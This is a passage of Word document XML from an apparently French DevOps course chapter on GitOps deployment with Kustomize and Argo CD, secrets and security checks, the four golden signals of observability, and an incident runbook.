          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>UN `PLAN` SANS SURPRISE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Avant d'appliquer, le plan doit annoncer uniquement des ajouts lors d'une création et aucune destruction lors d'une mise à jour. Toute destruction inattendue est traitée comme un défaut du projet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>93.6 Jalon 4 — Le déploiement convergent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les manifestes décrivent l'état désiré ; un agent le réconcilie. La version de l'image est un paramètre du dépôt, jamais une modification manuelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une surcouche de production · yaml</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deploiement/environnements/production/kustomization.yaml</w:t>
        <w:br/>
        <w:t>resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - ../../base</w:t>
        <w:br/>
        <w:br/>
        <w:t>images:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: ghcr.io/org/plateforme</w:t>
        <w:br/>
        <w:t xml:space="preserve">    newTag: "a1b2c3d"</w:t>
        <w:br/>
        <w:br/>
        <w:t>replicas:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: api</w:t>
        <w:br/>
        <w:t xml:space="preserve">    count: 3</w:t>
        <w:br/>
        <w:br/>
        <w:t>patches:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - path: ressources.yaml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.373 — Quatre contrôles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61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Contrôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3527"/>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Commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Attendu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2613"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Synchronisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3527"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>argocd app get</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Synced</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="261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Santé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3527"/>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kubectl get pods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Tous prêts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2613"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dérive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3527"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>argocd app diff</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2613"/>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Retour arrière</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3527"/>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git revert</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> puis synchronisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Version précédente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>93.7 Jalon 5 — Secrets et sécurité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Aucun secret ne figure dans un dépôt. Les valeurs sensibles viennent d'un coffre ou d'un fichier chiffré, et les droits sont nominatifs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre contrôles de sécurité · bash</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Vérifications avant remise</w:t>
        <w:br/>
        <w:t>gitleaks detect --source . --verbose        # aucun secret</w:t>
        <w:br/>
        <w:t>kubectl get secret -n production            # secrets gérés</w:t>
        <w:br/>
        <w:t>trivy image --severity CRITICAL ghcr.io/... # aucune faille critique</w:t>
        <w:br/>
        <w:t>kubectl get networkpolicy -n production     # trafic restreint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.374 — Quatre exigences de sécurité</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87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Risque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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Attendu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>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Non conforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secret en clair</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Aucun</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Une clé dans un YAML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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Image non signée</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Refusée au déploiement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Déploiement accepté</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conteneur privilégié</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Interdit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>privileged: true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2874"/>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Trafic libre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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Politiques réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>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Aucune politique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>93.8 Jalon 6 — Observabilité et exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le système expose ses métriques, écrit des journaux structurés et propage un identifiant de trace. Un tableau de bord couvre les quatre signaux d'or.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.375 — Quatre signaux d'or</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48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Signal d'or</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Mesure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Seuil d'alerte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2482"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Latence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3266"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>p95 par route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3266"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&gt; 800 ms pendant 10 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="248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Trafic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Requêtes par seconde</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Variation &gt; 50 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2482"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Erreurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3266"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Taux 5xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3266"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&gt; 2 % pendant 5 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2482"/>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Saturation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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CPU et connexions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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&gt; 85 % pendant 15 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un runbook utilisable · markdown</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="5" w:color="E8EDF1"/>
          <w:left w:val="single" w:sz="18" w:space="5" w:color="E0A21B"/>
          <w:bottom w:val="single" w:sz="4" w:space="5" w:color="E8EDF1"/>
          <w:right w:val="single" w:sz="4" w:space="5" w:color="E8EDF1"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8EDF1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># docs/runbook.md</w:t>
        <w:br/>
        <w:t>## Service indisponible</w:t>
        <w:br/>
        <w:br/>
        <w:t>1. `argocd app get plateforme-production` → état de synchronisation</w:t>
        <w:br/>
        <w:t>2. `kubectl get pods -n production` → pods en échec ?</w:t>
        <w:br/>
        <w:t>3. `kubectl describe pod &lt;nom&gt;` → événements</w:t>
        <w:br/>
        <w:t>4. `kubectl logs &lt;nom&gt; --previous` → journaux de l'instance précédente</w:t>
        <w:br/>
        <w:t>5. Vérifier le certificat : `openssl s_client -connect ... | openssl x509</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -noout -dates`</w:t>
        <w:br/>
        <w:t>6. Si la version précédente fonctionnait : `git revert` et synchroniser</w:t>
        <w:br/>
        <w:t>7. Consigner la chronologie dans `docs/incidents/`</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="E0A21B"/>
          <w:top w:val="nil" w:sz="0" w:space="0" w:color="auto"/>
          <w:bottom w:val="nil" w:sz="0" w:space="0" w:color="auto"/>
          <w:right w:val="nil" w:sz="0" w:space="0" w:color="auto"/>
          <w:insideH w:val="nil" w:sz="0" w:space="0" w:color="auto"/>
          <w:insideV w:val="nil" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9014"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9240"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FBF3E2"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>CRITÈRES DE RÉUSSITE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 dépôt reconstruit le système sans étape manuelle.</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 pipeline est vert et l'artefact est signé.</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 déploiement converge depuis Git.</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Aucun secret en clair.</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Les quatre signaux d'or sont visibles.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un retour arrière a été exécuté et chronométré.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TitreRubrique"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="26"/>
        </w:rPr>
